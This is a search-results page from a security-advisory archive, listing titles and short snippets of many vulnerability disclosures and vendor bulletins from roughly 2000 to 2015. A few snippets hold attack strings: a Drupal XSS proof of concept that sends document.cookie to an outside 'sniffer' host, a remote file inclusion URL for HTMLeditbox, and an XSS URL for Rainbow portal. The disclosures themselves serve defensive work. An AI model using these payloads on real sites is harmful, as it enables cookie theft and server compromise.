47153 matches found
[security bulletin] HPSBMU02994 rev.1 - HP BladeSystem c-Class Onboard Administrator (OA) running OpenSSL, Remote Disclosure of Information
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emrna-c04236062 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c04236062 Version: 1 HPSBMU02994 rev....
Android Browser Cross-Application Scripting (CVE-2011-2357)
============================================================= Android Browser Cross-Application Scripting CVE-2011-2357 ============================================================= 1 Background -------------- Android applications are executed in a sandbox environment, to ensure that no applicati...
[SECURITY] [DSA 2166-1] chromium-browser security update
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2166-1 [email protected] http://www.debian.org/security/ Giuseppe Iuculano February 16, 2011 http://www.debian.org/security/faq -...
Artofdefence Hyperguard Web Application Firewall: Remote Denial of Service
Security Advisory --------------------------------------- Vulnerable Software: Artofdefence Hyperguard Web Application Firewall Vulnerable Version: 3 branches: prior to 3.1.1-11637; prior to 3.0.3-11636; prior to 2.5.5-11635 Apache Plug-in Homepage: http://www.artofdefence.com/ Found by: Michael...
[SECURITY] CVE-2009-0781 XSS in Apache Tomcat examples web application
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 CVE-2009-0781: Apache Tomcat cross-site scripting vulnerability Severity: low Vendor: The Apache Software Foundation Versions Affected: Tomcat 6.0.0 to 6.0.18 Tomcat 5.5.0 to 5.5.27 Tomcat 4.1.0 to 4.1.39 Description: The calendar application in the...
Drupal reflected XSS
PoC: HTML TITLEDrupal reflected XSS by etteeitdefence.ru/TITLE!-- Full HTML =on ""scriptimg = new Image; img.src = "http://sniffer/image/s.gif?"+document.cookie;/script --BODY onload="p.submit" form action="http://freelanguage.org/comment/reply/532/1263"!--target-- method="post" id="p" input...
Microsoft Windows 2000/XP/2003/Vista ReadDirectoryChangesW informaton leak
Title: Microsoft Windows 2000/XP/2003/Vista ReadDirectoryChangesW informaton leak Author: 3APA3A, http://securityvulns.com Affected: Microsoft Windows 2000,XP,2003,Vista Exploitable: Yes Type: Remote from local network, authentication required NULL session was not tested. Class: Information leak...
[SA23669] Movable Type "nofollow" Plugin Comment Script Insertion
TITLE: Movable Type "nofollow" Plugin Comment Script Insertion SECUNIA ADVISORY ID: SA23669 VERIFY ADVISORY: http://secunia.com/advisories/23669/ CRITICAL: Less critical IMPACT: Cross Site Scripting WHERE: From remote SOFTWARE: Movable Type 3.x http://secunia.com/product/5753/ DESCRIPTION: A...
PmWiki Multiple Vulnerabilities
This is both a PmWiki and PHP advisory, and works only with registerglobals on. I totally missed the PHP GLOBALS GPC injection vulnerability and rediscovered that by my own if just few month before! arg!. Basically in the worst scenario be are in front of two separate vulnerabilities: one regardi...
Easy Message Board Directory Traversal and Remote Command
============================================================ ============================================================ Title: Easy Message Board Directory Traversal and Remote Command Execution Vulnerability discovery: SoulBlack - Security Research - http://soulblack.com.ar Date: 08/05/2005...
AIX 5.1/5.2/5.3 local root exploits
hi, i found some local security holes in IBM's AIX versions 5.1, 5.2 and 5.3 unix for IBM RS/6000 powerpc. 1 the first is a bug in all setuid diag related tools that use an environment variable as a prefix to an external binary executed as root. 2 the second is a classical stack overflow in a too...
[Full-Disclosure] [waraxe-2004-SA#033 - Multiple security holes in PhpNuke - part 1]
================================================================================ waraxe-2004-SA033 ================================================================================ Multiple security holes in PhpNuke - part 1...
memberlist.php of vBulletin
vBulletin ALL versions Vendor status: notified 3/18/2; no response Within the first few lines of code in memberlist.php, the variable $letterbits is evaled. Because of the way PHP initializes variables, we can inject HTML, or JavaScript into the document. So by directing a user to, for example:...
DST2K0023: Directory Traversal Possible & Denial of Service in Wo rm HTTP Server
============================================================================ Delphis Consulting Plc ============================================================================ Security Team Advisories 25/08/2000 [email protected] http://www.delphisplc.com/thinking/whitepapers/...
libmagic / file / fileinfo / PHP security vulnerabilities
Vulnerabilities in ELF parsing...
[KIS-2014-08] OpenCart <= 1.5.6.4 (cart.php) PHP Object Injection Vulnerability
----------------------------------------------------------------- OpenCart = 1.5.6.4 cart.php PHP Object Injection Vulnerability ----------------------------------------------------------------- - Software Link: http://www.opencart.com/ - Affected Versions: Version 1.5.6.4 and prior versions. -...
APPLE-SA-2014-04-22-4 AirPort Base Station Firmware Update 7.7.3
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2014-04-22-4 AirPort Base Station Firmware Update 7.7.3 AirPort Base Station Firmware Update 7.7.3 is now available and addresses the following: Available for: AirPort Extreme and AirPort Time Capsule base stations with 802.11ac Impact: An...
PHP directory traversal
Directory traversal in RFC 1867 files upload...
XSS vulnerability in Habari
Vulnerability ID: HTB22731 Reference: http://www.htbridge.ch/advisory/xssvulnerabilityinhabari.html Product: Habari Vendor: Habari http://habariproject.org/en/ Vulnerable Version: 0.6.5 Vendor Notification: 02 December 2010 Vulnerability Type: XSS Cross Site Scripting Status: Fixed by Vendor Risk...
[SECURITY] CVE-2010-4172: Apache Tomcat Manager application XSS vulnerability
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 CVE-2010-4172: Apache Tomcat Manager application XSS vulnerability Severity: Tomcat 7.0.x - Low, Tomcat 6.0.x - Moderate Vendor: The Apache Software Foundation Versions Affected: - - Tomcat 7.0.0 to 7.0.4 - Not affected in default configuration. -...
BitTorrent / uTorrent buffer overflow
Buffer overflow on peer information displaying...
HTMLeditbox & 2.2 >> RFI
+++++++ name & version :HTMLeditbox & 2.2 vendor: http://www.labs4.com by : www.hackerz.ir userz,s3rv3rhack3r,saeidonlylinux,dNetGuru bug : editor.php @include$settingsappdir.'/inc/config.php'; exploit : http://victim/editor.php?settingsappdir=http://shell ++++++...
Admin Phorum 3.3.1.a (del.php include_path)File Include Vulnerability
Admin Phorum 3.3.1.a del.php includepathFile Include Vulnerability Author: GoldM Hacker at w.Cn Mahmoodali Homepage: Www.Tryag.Cc Download S : http://www.phpforums.net/admin331.zip Other Info : http://www.phpforums.net/index.php?dir=dld v.Code : Line 3 require "$includepath/deletemessage.php";...
Elevation of privileges with debug registers on Win2K
Georgi Guninski security advisory 45, 2001 Elevation of privileges with debug registers on Win2K Systems affected: Win2K, Win2K SP1 have not tested on Win2K SP2 but according to Microsoft SP2 fixes this Risk: High Date: 24 May 2001 Legal Notice: This Advisory is Copyright c 2001 Georgi Guninski...
Re: Snort 1.6 and nmap 2.54beta1
From the BUGS file distributed with Snort: ------------------------------------------------------------------------- Bug reports should be sent to [email protected] Please include the following information with your report: System Architecture Sparc, x86, etc Operating System and version Linux...
Security Bulletin (MS00-036)
Microsoft Security Bulletin MS00-036 - -------------------------------------- Patch Available for "ResetBrowser Frame" and "HostAnnouncement Flooding" Vulnerabilities Originally posted: May 25, 2000 Summary ======= Microsoft has released a patch that eliminates two security vulnerabilities, one...
CVE-2015-3269 Apache Flex BlazeDS Insecure Xml Entity Expansion Vulnerability
CVE-2015-3269 Apache Flex BlazeDS Insecure Xml Entity Expansion Vulnerability Severity: Important Vendor: The Apache Software Foundation Versions Affected: Apache Flex BlazeDS 4.7.0 Description: When receiving XML encoded AMF messages containing DTD entities, the default XML parser configurations...
Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...
[SECURITY] CVE-2014-0075 Apache Tomcat denial of service
CVE-2014-0075 Denial of Service Severity: Important Vendor: The Apache Software Foundation Versions Affected: - Apache Tomcat 8.0.0-RC1 to 8.0.3 - Apache Tomcat 7.0.0 to 7.0.52 - Apache Tomcat 6.0.0 to 6.0.39 Description: It was possible to craft a malformed chunk size as part of a chucked reques...
CVE-2014-1904 XSS when using Spring MVC
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 CVE-2014-1904 XSS when using Spring MVC Severity: Moderate Vendor: Spring by Pivotal Versions Affected: - - Spring MVC 3.0.0 to 3.2.8 - - Spring MVC 4.0.0 to 4.0.1 - - Earlier unsupported versions may be affected Description: When a programmer does no...
Mozilla Firefox / Thunderbird / Seamonkey multiple security vulnerabilities
Memory corruption, use-after-free, privilege escalation, information leakage...
Multiple vulnerabilities in Open Journal Systems (OJS)
Advisory ID: HTB23079 Product: Open Journal Systems OJS Vendor: Public Knowledge Project Vulnerable Versions: 2.3.6 and probably prior Tested Version: 2.3.6 Vendor Notification: 29 February 2012 Vendor Patch: 16 March 2012 Public Disclosure: 21 March 2012 Vulnerability Type: Arbitrary File...
Canoy Softwares (search_result.php?loc_id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD Remote SQL injection Vulnerability Canoy Softwares searchresult.php?locid AuTh0r : EhsanHp200 H0ME : www.ehsanhp.blogsky.com Email : [email protected] Vendor : http://canoysoft.in/ Persian Gulf 4 Ever! Dork : "Powered by Canoy Softwares"...
[UNIX] Artmedic Links File Inclusion Vulnerability
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion The SecuriTeam alerts list - Free, Accurate, Independent. Get your security news from a reliable source...
NetStructure 7110 console backdoor
@Stake Inc. L0pht Research Labs www.atstake.com www.L0pht.com Security Advisory Advisory Name: NetStructure 7110 console backdoor Release Date: May 8th, 2000 Application: Intel NetStructure 7110 previously the Ipivot Commerce Accelerator 1000 Severity: Box can be compromised through configuration...
[SECURITY] [DSA 3280-1] php5 security update
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-3280-1 [email protected] http://www.debian.org/security/ Moritz Muehlenhoff June 07, 2015 http://www.debian.org/security/faq -...
HP Network Node Manager i information leakage
No description provided...
ZDI-10-234: Cisco ICM Setup Manager Agent.exe HandleQueryNodeInfoReq Remote Code Execution Vulnerability
ZDI-10-234: Cisco ICM Setup Manager Agent.exe HandleQueryNodeInfoReq Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-234 November 7, 2010 -- CVE ID: CVE-2010-3040 -- CVSS: 10, AV:N/AC:L/Au:N/C:C/I:C/A:C -- Affected Vendors: Cisco -- Affected Products: Cisco...
IPB v2.x up to 3.0.4 XSS vulnerability
Invision Power Board XSS vulnerability Software : Invision Power Board IPB Affected : IPB v2.x up to v3.0.4 prior versions might be vulnerable as well Remote : Yes Required : Internet Explorer +5.0 Vendor : http://www.invisionpower.com/ Download : Commercially available Author : Xacker Contact :...
PR07-21: Webbler CMS forms are susceptible to spamming and phishing abuses
PR07-21: Webbler CMS forms are susceptible to spamming and phishing abuses This advisory has been published following consultation with UK CPNI formerly known as NISCC Date Found: 14th June 2007 Successfully tested on: Webbler CMS version 3.1.3. Earlier versions are possibly affected as well. Not...
Sv(ADP) Forum 2.0.3 Remote Password Disclosure Vulnerablity
SvADP Forum 2.0.3 Remote Password Disclosure Vulnerablity S.name:ADP Forum Affected version:2.0.3 Download&Demo:http://www.linux.it/fedro/index.php?pag=scripts&lang=en Risk:Very Highly Critical Author:Dr Max Virus Location:Egypt POC: http:/target/path/users/admin.txt As We see Admin name and hash...
Microsoft Windows multiple security vulnerabilities
OLE code execution, Internet Explorer multiple vulnerabilities, Schannel code execution, XML Core Services code execution, TCP/IP privilege escalation, Windows Audio Service privilege escalation, .NET Framework privilege escalation, RDP restrictions bypass, IIS restrictions bypass, IME privilege...
[security bulletin] HPSBST02620 SSRT100356 rev.1 - HP StorageWorks Modular Smart Array P2000 G3, Remote Unauthorized Access
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c02660754 Version: 1 HPSBST02620 SSRT100356 rev.1 - HP StorageWorks Modular Smart Array P2000 G3, Remote Unauthorized Access NOTICE: The information in this Security Bulletin should be acted upon ...
US-CERT Technical Cyber Security Alert TA09-294A -- Oracle Updates for Multiple Vulnerabilities
Oracle Critical Patch Update Advisory - October 2009 Description A Critical Patch Update is a collection of patches for multiple security vulnerabilities. It also includes non-security fixes that are required because of interdependencies by those security patches. Critical Patch Updates are...
PBLang <= 4.99.17.q Remote File Rewriting / Remote Command Execution
--------------------------------------------------------------- / | | / | / |/ | | |/ | | / | | | | | |/ | | // | || | ||| /| / / | |||| /| / / --------------------------------------------------------------- Http://www.inj3ct-it.org Staffatinj3ct-itdotorg Original Here:...
E-vanced Solutions Multiple Vulnerabilites
E-vanced Solutions Multiple Vulnerabilites http://www.e-vancedsolutions.com First off, script code can be injected into all fields when you register for some event. This presents a possibility for cookie theft from logged in users. Next off, theres there exists an SQL injection point from the...
XSS in Rainbow with Rainbow.Zen
hey ,, Vulnerable : rainbowportal web : http://rainbowportal.net/ XSS : 1- http://example.net/jira/secure/BrowseProject.jspa?id="scriptalert'BLacKZeRo'/script Discovered By BLacK ZeRo [email protected] Best regards ,,...
Etnus TotalView 5.
Program: Etnus TotalView Version: 5.0.0-4 DESCRIPTION ----------- TotalView is a multiprocess source-level debugger for programs written in the C, C++, and Fortran programming languages. TotalView is part of a suite of programming tools from Etnus, LLC. PROBLEM ------- Failed to install the files...
13 December 2001 Cumulative Patch for IE
---------------------------------------------------------------------- Title: 13 December 2001 Cumulative Patch for IE Date: 13 December 2001 Software: Internet Explorer Impact: Run Code of an Attacker's Choice Max Risk: Critical Bulletin: MS01-058 Microsoft encourages customers to review the...
def-2001-09: Winzip32 zipandemail Buffer Overflow
====================================================================== Defcom Labs Advisory def-2001-09 Winzip32 zipandemail Buffer Overflow Author: Peter Grьndl [email protected] Release Date: 2001-03-02 ======================================================================...